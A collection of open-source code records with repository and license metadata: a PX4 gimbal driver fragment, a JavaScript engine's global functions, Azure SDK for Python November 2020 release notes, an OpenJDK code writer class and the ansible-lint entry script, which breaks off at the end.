param_get(param_handles.mnt_man_yaw, ¶ms.mnt_man_yaw);
got_changes = prev_params != params;
}
bool get_params(ParameterHandles ¶m_handles, Parameters ¶ms)
{
param_handles.mnt_mode_in = param_find("MNT_MODE_IN");
param_handles.mnt_mode_out = param_find("MNT_MODE_OUT");
param_handles.mnt_mav_sysid = param_find("MNT_MAV_SYSID");
param_handles.mnt_mav_compid = param_find("MNT_MAV_COMPID");
param_handles.mnt_ob_lock_mode = param_find("MNT_OB_LOCK_MODE");
param_handles.mnt_ob_norm_mode = param_find("MNT_OB_NORM_MODE");
param_handles.mnt_man_control = param_find("MNT_MAN_CONTROL");
param_handles.mnt_man_pitch = param_find("MNT_MAN_PITCH");
param_handles.mnt_man_roll = param_find("MNT_MAN_ROLL");
param_handles.mnt_man_yaw = param_find("MNT_MAN_YAW");
if (param_handles.mnt_mode_in == PARAM_INVALID ||
param_handles.mnt_mode_out == PARAM_INVALID ||
param_handles.mnt_mav_sysid == PARAM_INVALID ||
param_handles.mnt_mav_compid == PARAM_INVALID ||
param_handles.mnt_ob_lock_mode == PARAM_INVALID ||
param_handles.mnt_ob_norm_mode == PARAM_INVALID ||
param_handles.mnt_man_control == PARAM_INVALID ||
param_handles.mnt_man_pitch == PARAM_INVALID ||
param_handles.mnt_man_roll == PARAM_INVALID ||
param_handles.mnt_man_yaw == PARAM_INVALID) {
return false;
}
bool dummy;
update_params(param_handles, params, dummy);
return true;
}
|
C++
|
BSD-3-Clause
|
mazahner/Firmware/src/drivers/vmount/vmount.cpp
|
47901599-8de3-4aa6-8835-9665fcc115f3
|
[{"tag": "EMAIL", "value": "beat-kueng@gmx.net", "start": 1820, "end": 1838, "context": "or Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV_MOUNT driver for controlling mavlink gimb"}, {"tag": "USERNAME", "value": "thedevleon", "start": 1786, "end": 1796, "context": "\n\n/**\n * @file vmount.cpp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV"}, {"tag": "NAME", "value": "Beat K\u00fcng", "start": 1809, "end": 1818, "context": "pp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV_MOUNT driver for cont"}, {"tag": "NAME", "value": "Leon M\u00fcller", "start": 1773, "end": 1784, "context": "************/\n\n/**\n * @file vmount.cpp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx"}]
|
[{"tag": "EMAIL", "value": "beat-kueng@gmx.net", "start": 1820, "end": 1838, "context": "or Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV_MOUNT driver for controlling mavlink gimb"}, {"tag": "USERNAME", "value": "thedevleon", "start": 1786, "end": 1796, "context": "\n\n/**\n * @file vmount.cpp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV"}, {"tag": "NAME", "value": "Beat K\u00fcng", "start": 1809, "end": 1818, "context": "pp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV_MOUNT driver for cont"}, {"tag": "NAME", "value": "Leon M\u00fcller", "start": 1773, "end": 1784, "context": "************/\n\n/**\n * @file vmount.cpp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx"}]
|
/*
Copyright 2012 Aphid Mobile
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
/*
* Copyright (C) 1999-2002 Harri Porten (porten@kde.org)
* Copyright (C) 2001 Peter Kelly (pmk@post.com)
* Copyright (C) 2003, 2004, 2005, 2006, 2007, 2008, 2009 Apple Inc. All rights reserved.
* Copyright (C) 2007 Cameron Zwarich (cwzwarich@uwaterloo.ca)
* Copyright (C) 2007 Maks Orlovich
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Library General Public License for more details.
*
* You should have received a copy of the GNU Library General Public License
* along with this library; see the file COPYING.LIB. If not, write to
* the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301, USA.
*
*/
#include "config.h"
#include "AJGlobalObjectFunctions.h"
#include "CallFrame.h"
#include "GlobalEvalFunction.h"
#include "Interpreter.h"
#include "AJGlobalObject.h"
#include "AJString.h"
#include "AJStringBuilder.h"
#include "Lexer.h"
#include "LiteralParser.h"
#include "Nodes.h"
#include "Parser.h"
#include "StringBuilder.h"
#include "StringExtras.h"
#include "dtoa.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wtf/ASCIICType.h>
#include <wtf/Assertions.h>
#include <wtf/MathExtras.h>
#include <wtf/unicode/UTF8.h>
using namespace ATF;
using namespace Unicode;
namespace AJ {
static AJValue encode(ExecState* exec, const ArgList& args, const char* doNotEscape)
{
UString str = args.at(0).toString(exec);
CString cstr = str.UTF8String(true);
if (!cstr.data())
return throwError(exec, URIError, "String contained an illegal UTF-16 sequence.");
AJStringBuilder builder;
const char* p = cstr.data();
for (size_t k = 0; k < cstr.length(); k++, p++) {
char c = *p;
if (c && strchr(doNotEscape, c))
builder.append(c);
else {
char tmp[4];
snprintf(tmp, sizeof(tmp), "%%%02X", static_cast<unsigned char>(c));
builder.append(tmp);
}
}
return builder.build(exec);
}
static AJValue decode(ExecState* exec, const ArgList& args, const char* doNotUnescape, bool strict)
{
AJStringBuilder builder;
UString str = args.at(0).toString(exec);
int k = 0;
int len = str.size();
const UChar* d = str.data();
UChar u = 0;
while (k < len) {
const UChar* p = d + k;
UChar c = *p;
if (c == '%') {
int charLen = 0;
if (k <= len - 3 && isASCIIHexDigit(p[1]) && isASCIIHexDigit(p[2])) {
const char b0 = Lexer::convertHex(p[1], p[2]);
const int sequenceLen = UTF8SequenceLength(b0);
if (sequenceLen != 0 && k <= len - sequenceLen * 3) {
charLen = sequenceLen * 3;
char sequence[5];
sequence[0] = b0;
for (int i = 1; i < sequenceLen; ++i) {
const UChar* q = p + i * 3;
if (q[0] == '%' && isASCIIHexDigit(q[1]) && isASCIIHexDigit(q[2]))
sequence[i] = Lexer::convertHex(q[1], q[2]);
else {
charLen = 0;
break;
}
}
if (charLen != 0) {
sequence[sequenceLen] = 0;
const int character = decodeUTF8Sequence(sequence);
if (character < 0 || character >= 0x110000)
charLen = 0;
else if (character >= 0x10000) {
// Convert to surrogate pair.
builder.append(static_cast<UChar>(0xD800 | ((character - 0x10000) >> 10)));
u = static_cast<UChar>(0xDC00 | ((character - 0x10000) & 0x3FF));
} else
u = static_cast<UChar>(character);
}
}
}
if (charLen == 0) {
if (strict)
return throwError(exec, URIError);
// The only case where we don't use "strict" mode is the "unescape" function.
// For that, it's good to support the wonky "%u" syntax for compatibility with WinIE.
if (k <= len - 6 && p[1] == 'u'
&& isASCIIHexDigit(p[2]) && isASCIIHexDigit(p[3])
&& isASCIIHexDigit(p[4]) && isASCIIHexDigit(p[5])) {
charLen = 6;
u = Lexer::convertUnicode(p[2], p[3], p[4], p[5]);
}
}
if (charLen && (u == 0 || u >= 128 || !strchr(doNotUnescape, u))) {
c = u;
k += charLen - 1;
}
}
k++;
builder.append(c);
}
return builder.build(exec);
}
bool isStrWhiteSpace(UChar c)
{
switch (c) {
case 0x0009:
case 0x000A:
case 0x000B:
case 0x000C:
case 0x000D:
case 0x0020:
case 0x00A0:
case 0x2028:
case 0x2029:
return true;
default:
return c > 0xff && isSeparatorSpace(c);
}
}
static int parseDigit(unsigned short c, int radix)
{
int digit = -1;
if (c >= '0' && c <= '9')
digit = c - '0';
else if (c >= 'A' && c <= 'Z')
digit = c - 'A' + 10;
else if (c >= 'a' && c <= 'z')
digit = c - 'a' + 10;
if (digit >= radix)
return -1;
return digit;
}
double parseIntOverflow(const char* s, int length, int radix)
{
double number = 0.0;
double radixMultiplier = 1.0;
for (const char* p = s + length - 1; p >= s; p--) {
if (radixMultiplier == Inf) {
if (*p != '0') {
number = Inf;
break;
}
} else {
int digit = parseDigit(*p, radix);
number += digit * radixMultiplier;
}
radixMultiplier *= radix;
}
return number;
}
static double parseInt(const UString& s, int radix)
{
int length = s.size();
const UChar* data = s.data();
int p = 0;
while (p < length && isStrWhiteSpace(data[p]))
++p;
double sign = 1;
if (p < length) {
if (data[p] == '+')
++p;
else if (data[p] == '-') {
sign = -1;
++p;
}
}
if ((radix == 0 || radix == 16) && length - p >= 2 && data[p] == '0' && (data[p + 1] == 'x' || data[p + 1] == 'X')) {
radix = 16;
p += 2;
} else if (radix == 0) {
if (p < length && data[p] == '0')
radix = 8;
else
radix = 10;
}
if (radix < 2 || radix > 36)
return NaN;
int firstDigitPosition = p;
bool sawDigit = false;
double number = 0;
while (p < length) {
int digit = parseDigit(data[p], radix);
if (digit == -1)
break;
sawDigit = true;
number *= radix;
number += digit;
++p;
}
if (number >= mantissaOverflowLowerBound) {
// FIXME: It is incorrect to use UString::ascii() here because it's not thread-safe.
if (radix == 10)
number = ATF::strtod(s.substr(firstDigitPosition, p - firstDigitPosition).ascii(), 0);
else if (radix == 2 || radix == 4 || radix == 8 || radix == 16 || radix == 32)
number = parseIntOverflow(s.substr(firstDigitPosition, p - firstDigitPosition).ascii(), p - firstDigitPosition, radix);
}
if (!sawDigit)
return NaN;
return sign * number;
}
static double parseFloat(const UString& s)
{
// Check for 0x prefix here, because toDouble allows it, but we must treat it as 0.
// Need to skip any whitespace and then one + or - sign.
int length = s.size();
const UChar* data = s.data();
int p = 0;
while (p < length && isStrWhiteSpace(data[p]))
++p;
if (p < length && (data[p] == '+' || data[p] == '-'))
++p;
if (length - p >= 2 && data[p] == '0' && (data[p + 1] == 'x' || data[p + 1] == 'X'))
return 0;
// FIXME: UString::toDouble will ignore leading ASCII spaces, but we need to ignore
// other StrWhiteSpaceChar values as well.
return s.toDouble(true /*tolerant*/, false /* NaN for empty string */);
}
AJValue JSC_HOST_CALL globalFuncEval(ExecState* exec, AJObject* function, AJValue thisValue, const ArgList& args)
{
AJObject* thisObject = thisValue.toThisObject(exec);
AJObject* unwrappedObject = thisObject->unwrappedObject();
if (!unwrappedObject->isGlobalObject() || static_cast<AJGlobalObject*>(unwrappedObject)->evalFunction() != function)
return throwError(exec, EvalError, "The \"this\" value passed to eval must be the global object from which eval originated");
AJValue x = args.at(0);
if (!x.isString())
return x;
UString s = x.toString(exec);
LiteralParser preparser(exec, s, LiteralParser::NonStrictJSON);
if (AJValue parsedObject = preparser.tryLiteralParse())
return parsedObject;
RefPtr<EvalExecutable> eval = EvalExecutable::create(exec, makeSource(s));
AJObject* error = eval->compile(exec, static_cast<AJGlobalObject*>(unwrappedObject)->globalScopeChain().node());
if (error)
return throwError(exec, error);
return exec->interpreter()->execute(eval.get(), exec, thisObject, static_cast<AJGlobalObject*>(unwrappedObject)->globalScopeChain().node(), exec->exceptionSlot());
}
AJValue JSC_HOST_CALL globalFuncParseInt(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
AJValue value = args.at(0);
int32_t radix = args.at(1).toInt32(exec);
if (radix != 0 && radix != 10)
return jsNumber(exec, parseInt(value.toString(exec), radix));
if (value.isInt32())
return value;
if (value.isDouble()) {
double d = value.asDouble();
if (isfinite(d))
return jsNumber(exec, (d > 0) ? floor(d) : ceil(d));
if (isnan(d) || isinf(d))
return jsNaN(exec);
return jsNumber(exec, 0);
}
return jsNumber(exec, parseInt(value.toString(exec), radix));
}
AJValue JSC_HOST_CALL globalFuncParseFloat(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
return jsNumber(exec, parseFloat(args.at(0).toString(exec)));
}
AJValue JSC_HOST_CALL globalFuncIsNaN(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
return jsBoolean(isnan(args.at(0).toNumber(exec)));
}
AJValue JSC_HOST_CALL globalFuncIsFinite(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
double n = args.at(0).toNumber(exec);
return jsBoolean(!isnan(n) && !isinf(n));
}
AJValue JSC_HOST_CALL globalFuncDecodeURI(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
static const char do_not_unescape_when_decoding_URI[] =
"#$&+,/:;=?@";
return decode(exec, args, do_not_unescape_when_decoding_URI, true);
}
AJValue JSC_HOST_CALL globalFuncDecodeURIComponent(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
return decode(exec, args, "", true);
}
AJValue JSC_HOST_CALL globalFuncEncodeURI(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
static const char do_not_escape_when_encoding_URI[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"!#$&'()*+,-./:;=?@_~";
return encode(exec, args, do_not_escape_when_encoding_URI);
}
AJValue JSC_HOST_CALL globalFuncEncodeURIComponent(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
static const char do_not_escape_when_encoding_URI_component[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"!'()*-._~";
return encode(exec, args, do_not_escape_when_encoding_URI_component);
}
AJValue JSC_HOST_CALL globalFuncEscape(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
static const char do_not_escape[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"*+-./@_";
AJStringBuilder builder;
UString str = args.at(0).toString(exec);
const UChar* c = str.data();
for (unsigned k = 0; k < str.size(); k++, c++) {
int u = c[0];
if (u > 255) {
char tmp[7];
snprintf(tmp, sizeof(tmp), "%%u%04X", u);
builder.append(tmp);
} else if (u != 0 && strchr(do_not_escape, static_cast<char>(u)))
builder.append(c, 1);
else {
char tmp[4];
snprintf(tmp, sizeof(tmp), "%%%02X", u);
builder.append(tmp);
}
}
return builder.build(exec);
}
AJValue JSC_HOST_CALL globalFuncUnescape(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
StringBuilder builder;
UString str = args.at(0).toString(exec);
int k = 0;
int len = str.size();
while (k < len) {
const UChar* c = str.data() + k;
UChar u;
if (c[0] == '%' && k <= len - 6 && c[1] == 'u') {
if (isASCIIHexDigit(c[2]) && isASCIIHexDigit(c[3]) && isASCIIHexDigit(c[4]) && isASCIIHexDigit(c[5])) {
u = Lexer::convertUnicode(c[2], c[3], c[4], c[5]);
c = &u;
k += 5;
}
} else if (c[0] == '%' && k <= len - 3 && isASCIIHexDigit(c[1]) && isASCIIHexDigit(c[2])) {
u = UChar(Lexer::convertHex(c[1], c[2]));
c = &u;
k += 2;
}
k++;
builder.append(*c);
}
return jsString(exec, builder.build());
}
#ifndef NDEBUG
AJValue JSC_HOST_CALL globalFuncJSCPrint(ExecState* exec, AJObject*, AJValue, const ArgList& args)
{
CString string = args.at(0).toString(exec).UTF8String();
puts(string.data());
return jsUndefined();
}
#endif
} // namespace AJ
|
C++
|
Apache-2.0
|
PioneerLab/OpenAphid-AJ/DISCONTINUED/runtime/AJGlobalObjectFunctions.cpp
|
c461ad0a-0585-4d2b-8cd7-08a02e3c021c
|
[{"tag": "NAME", "value": "Cameron Zwarich", "start": 786, "end": 801, "context": " Inc. All rights reserved.\n * Copyright (C) 2007 Cameron Zwarich (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 M"}, {"tag": "EMAIL", "value": "cwzwarich@uwaterloo.ca", "start": 803, "end": 825, "context": "reserved.\n * Copyright (C) 2007 Cameron Zwarich (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 Maks Orlovich\n *\n * This"}, {"tag": "NAME", "value": "Peter Kelly", "start": 645, "end": 656, "context": "ri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com)\n * Copyright (C) 2003, 2004, 2005"}, {"tag": "EMAIL", "value": "porten@kde.org", "start": 606, "end": 620, "context": "\n\n*/\n/*\n * Copyright (C) 1999-2002 Harri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com"}, {"tag": "EMAIL", "value": "pmk@post.com", "start": 658, "end": 670, "context": "rten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com)\n * Copyright (C) 2003, 2004, 2005, 2006, 2007, "}, {"tag": "NAME", "value": "Maks Orlovich", "start": 850, "end": 863, "context": "h (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 Maks Orlovich\n *\n * This library is free software; you can red"}, {"tag": "NAME", "value": "Harri Porten", "start": 592, "end": 604, "context": "r the License.\n\n*/\n/*\n * Copyright (C) 1999-2002 Harri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kel"}]
|
[{"tag": "NAME", "value": "Cameron Zwarich", "start": 786, "end": 801, "context": " Inc. All rights reserved.\n * Copyright (C) 2007 Cameron Zwarich (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 M"}, {"tag": "EMAIL", "value": "cwzwarich@uwaterloo.ca", "start": 803, "end": 825, "context": "reserved.\n * Copyright (C) 2007 Cameron Zwarich (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 Maks Orlovich\n *\n * This"}, {"tag": "NAME", "value": "Peter Kelly", "start": 645, "end": 656, "context": "ri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com)\n * Copyright (C) 2003, 2004, 2005"}, {"tag": "EMAIL", "value": "porten@kde.org", "start": 606, "end": 620, "context": "\n\n*/\n/*\n * Copyright (C) 1999-2002 Harri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com"}, {"tag": "EMAIL", "value": "pmk@post.com", "start": 658, "end": 670, "context": "rten@kde.org)\n * Copyright (C) 2001 Peter Kelly (pmk@post.com)\n * Copyright (C) 2003, 2004, 2005, 2006, 2007, "}, {"tag": "NAME", "value": "Maks Orlovich", "start": 850, "end": 863, "context": "h (cwzwarich@uwaterloo.ca)\n * Copyright (C) 2007 Maks Orlovich\n *\n * This library is free software; you can red"}, {"tag": "NAME", "value": "Harri Porten", "start": 592, "end": 604, "context": "r the License.\n\n*/\n/*\n * Copyright (C) 1999-2002 Harri Porten (porten@kde.org)\n * Copyright (C) 2001 Peter Kel"}]
|
---
title: Azure SDK for Python (November 2020)
layout: post
tags: python
sidebar: releases_sidebar
repository: azure/azure-sdk-for-python
---
The Azure SDK team is pleased to make available the November 2020 client library release.
#### GA
- _Add packages_
#### Updates
- _Add packages_
#### Beta
- Service Bus
- Search
- Metrics Advisor
- Eventgrid
- Form Recognizer
## Installation Instructions
To install the latest beta version of the packages, copy and paste the following commands into a terminal:
```bash
pip install azure-servicebus --pre
pip install azure-search-documents --pre
pip install azure-ai-metricsadvisor --pre
pip install azure-eventgrid --pre
pip install azure-ai-formrecognizer --pre
```
## Feedback
If you have a bug or feature request for one of the libraries, please post an issue to [GitHub](https://github.com/azure/azure-sdk-for-python/issues).
## Release highlights
### Service Bus [Changelog](https://github.com/Azure/azure-sdk-for-python/blob/master/sdk/servicebus/azure-servicebus/CHANGELOG.md)
#### New Features
* Addition of `timeout` paramter to sending, lock renewel, and settlement functions.
* Addition of `auto_lock_renewer` parameter when getting a receiver to opt-into auto-registration of lock renewal for messages on receipt (or, if a session receiver, the session on open).
#### Breaking changes
* Significant renames across parameter, entity, and exception types such as utilizing a ServiceBus prefix, e.g. `ServiceBusMessage`.
* Refactors all service-impacting operations from the `ServiceBusMessage` object onto the `ServiceBusReceiver` object itself, e.g. lock renewal and settlement.
* `get_*_session_receiver` functions have been incorporated into their `get_*_receiver` counterparts, activated by passing a `session_id` parameter.
* Continued Exception behavior cleanup, normalization, and documentation, as well as naming polish in line with the broad name prefix alignment.
### Metrics Advisor [Changelog](https://github.com/Azure/azure-sdk-for-python/blob/master/sdk/metricsadvisor/azure-ai-metricsadvisor/CHANGELOG.md)
#### Breaking Changes
- Significant renames across parameters and methods. Please go to the [Changelog](https://github.com/Azure/azure-sdk-for-python/blob/master/sdk/metricsadvisor/azure-ai-metricsadvisor/CHANGELOG.md) for detail information.
### Form Recognizer [Changelog](https://github.com/Azure/azure-sdk-for-python/blob/master/sdk/formrecognizer/azure-ai-formrecognizer/CHANGELOG.md)
This version of the SDK defaults to the latest supported API version, which currently is v2.1-preview.
#### New Features
- Support for two new prebuilt recognition models for invoices and business cards through the
`begin_recognize_invoices()` and `begin_recognize_business_cards()` methods (as well as their `from_url` counterparts)
of `FormRecognizerClient`.
- Support for selection marks as a new fundamental form element. This type is supported in content recognition and in
training/recognizing custom forms (labeled only).
- Support for creating composed models from a collection of existing models (trained with labels) through the
`begin_create_composed_model()` method of `FormTrainingClient`.
- A `model_name` keyword argument added for model training (both `begin_training()` and `begin_create_composed_model()`) that
can specify a human-readable name for a model.
- Support for the bitmap image format (with content type "image/bmp") in prebuilt model recognition and content recognition.
- A `locale` keyword argument added for all prebuilt model methods, allowing for the specification of a document's origin to assist the
service with correct analysis of the document's content.
- A `language` keyword argument added for the content recognition method `begin_recognize_content()` that specifies which
language to process the document in.
- A `pages` keyword argument added for the content recognition method `begin_recognize_content()` that specifies which pages
in a multi-page document should be analyzed.
- Additional properties added to response models - see Changelog for detailed information.
## Latest Releases
View all the latest versions of Python packages [here][python-latest-releases].
{% include refs.md %}
|
Markdown
|
MIT
|
DominikMe/azure-sdk/releases/2020-11/python.md
|
b5f44525-e83c-4631-b0ca-d03ff55b2b4e
|
[]
|
[]
|
/*
* Copyright (c) 1997, 2010, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
package com.sun.codemodel.internal.writer;
import java.io.FilterOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;
import com.sun.codemodel.internal.CodeWriter;
import com.sun.codemodel.internal.JPackage;
/**
* Output all source files into a single stream with a little
* formatting header in front of each file.
*
* This is primarily for human consumption of the generated source
* code, such as to debug/test CodeModel or to quickly inspect the result.
*
* @author
* Kohsuke Kawaguchi (kohsuke.kawaguchi@sun.com)
*/
public class SingleStreamCodeWriter extends CodeWriter {
private final PrintStream out;
/**
* @param os
* This stream will be closed at the end of the code generation.
*/
public SingleStreamCodeWriter( OutputStream os ) {
out = new PrintStream(os);
}
public OutputStream openBinary(JPackage pkg, String fileName) throws IOException {
String pkgName = pkg.name();
if(pkgName.length()!=0) pkgName += '.';
out.println(
"-----------------------------------" + pkgName+fileName +
"-----------------------------------");
return new FilterOutputStream(out) {
public void close() {
// don't let this stream close
}
};
}
public void close() throws IOException {
out.close();
}
}
|
Java
|
MIT
|
jsycdut/source-code/openjdk8/openjdk/jaxws/src/share/jaxws_classes/com/sun/codemodel/internal/writer/SingleStreamCodeWriter.java
|
20ba0cb3-a1d4-4ae6-9dd0-e42eda28e504
|
[{"tag": "NAME", "value": "Kohsuke Kawaguchi", "start": 1747, "end": 1764, "context": "quickly inspect the result.\n *\n * @author\n * Kohsuke Kawaguchi (kohsuke.kawaguchi@sun.com)\n */\npublic class Sing"}, {"tag": "EMAIL", "value": "kohsuke.kawaguchi@sun.com", "start": 1766, "end": 1791, "context": " result.\n *\n * @author\n * Kohsuke Kawaguchi (kohsuke.kawaguchi@sun.com)\n */\npublic class SingleStreamCodeWriter extends "}]
|
[{"tag": "NAME", "value": "Kohsuke Kawaguchi", "start": 1747, "end": 1764, "context": "quickly inspect the result.\n *\n * @author\n * Kohsuke Kawaguchi (kohsuke.kawaguchi@sun.com)\n */\npublic class Sing"}, {"tag": "EMAIL", "value": "kohsuke.kawaguchi@sun.com", "start": 1766, "end": 1791, "context": " result.\n *\n * @author\n * Kohsuke Kawaguchi (kohsuke.kawaguchi@sun.com)\n */\npublic class SingleStreamCodeWriter extends "}]
|
#!/usr/bin/env python
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import print_function
import errno
import optparse
import sys
import ansiblelint
import ansiblelint.formatters as formatters
import six
from ansiblelint import RulesCollection
from ansiblelint.version import __version__
import yaml
import os
def load_config(config_file):
config_path = config_file if config_file else ".ansible-lint"
if os.path.exists(config_path):
with open(config_path, "r") as stream:
try:
return yaml.load(stream)
except yaml.YAMLError:
pass
return None
def main():
formatter = formatters.Formatter()
parser = optparse.OptionParser("%prog [options] playbook.yml [playbook2 ...]",
version="%prog " + __version__)
parser.add_option('-L', dest='listrules', default=False,
action='store_true', help="list all the rules")
parser.add_option('-q', dest='quiet',
default=False,
action='store_true',
help="quieter, although not silent output")
parser.add_option('-p', dest='parseable',
default=False,
action='store_true',
help="parseable output in the format of pep8")
parser.add_option('-r', action='append', dest='rulesdir',
default=[], type='str',
help="specify one or more rules directories using "
"one or more -r arguments. Any -r flags override "
"the default rules in %s, unless -R is also used."
% ansiblelint.default_rulesdir)
parser.add_option('-R', action='store_true',
default=False,
dest='use_default_rules',
help="Use default rules in %s in addition to any extra "
"rules directories specified with -r. There is "
"no need to specify this if no -r flags are used"
% ansiblelint.default_rulesdir)
parser.add_option('-t', dest='tags',
action='append',
default=[],
help="only check rules whose id/tags match these values")
parser.add_option('-T', dest='listtags', action='store_true',
help="list all the tags")
parser.add_option('-v', dest='verbosity', action='count',
help="Increase verbosity level",
default=0)
parser.add_option('-x', dest='skip_list', default=[], action='append',
help="only check rules whose id/tags do not " +
"match these values")
parser.add_option('--nocolor', dest='colored',
default=hasattr(sys.stdout, 'isatty') and sys.stdout.isatty(),
action='store_false',
help="disable colored output")
parser.add_option('--force-color', dest='colored',
action='store_true',
help="Try force colored output (relying on ansible's code)")
parser.add_option('--exclude', dest='exclude_paths', action='append',
help='path to directories or files to skip. This option'
' is repeatable.',
default=[])
parser.add_option('-c', help='Specify configuration file to use. Defaults to ".ansible-lint"')
options, args = parser.parse_args(sys.argv[1:])
config = load_config(options.c)
if config:
if 'quiet' in config:
options.quiet = options.quiet or config['quiet']
if 'parseable' in config:
options.parseable = options.parseable or config['parseable']
if 'use_default_rules' in config:
options.use_default_rules = options.use_default_rules or config['use_default_rules']
if 'verbosity' in config:
options.verbosity = options.verbosity + config['verbosity']
if 'exclude_paths' in config:
options.exclude_paths = options.exclude_paths + config['exclude_paths']
if 'rulesdir' in config:
options.rulesdir = options.rulesdir + config['rulesdir']
if 'skip_list' in config:
options.skip_list = options.skip_list + config['skip_list']
if 'tags' in config:
options.tags = options.tags + config['tags']
if options.quiet:
formatter = formatters.QuietFormatter()
if options.parseable:
formatter = formatters.ParseableFormatter()
if len(args) == 0 and not (options.listrules or options.listtags):
parser.print_help(file=sys.stderr)
return 1
if options.use_default_rules:
rulesdirs = options.rulesdir + [ansiblelint.default_rulesdir]
else:
rulesdirs = options.rulesdir or [ansiblelint.default_rulesdir]
rules = RulesCollection()
for rulesdir in rulesdirs:
rules.extend(RulesCollection.create_from_directory(rulesdir))
if options.listrules:
print(rules)
return 0
if options.listtags:
print(rules.listtags())
return 0
if isinstance(options.tags, six.string_types):
options.tags = options.tags.split(',')
skip = set()
for s in options.skip_list:
skip.update(s.split(','))
options.skip_list = frozenset(skip)
playbooks = set(args)
matches = list()
checked_files = set()
for playbook in playbooks:
runner = ansiblelint.Runner(rules, playbook, options.tags,
options.skip_list, options.exclude_paths,
options.verbosity, checked_files)
matches.extend(runner.run())
matches.sort(key=lambda x: (x.filename, x.linenumber, x.rule.id))
for match in matches:
print(formatter.format(match, options.colored))
if len(matches):
return 2
else:
return 0
if __name__ == "__main__":
try:
sys.exit(main())
except IOError as exc:
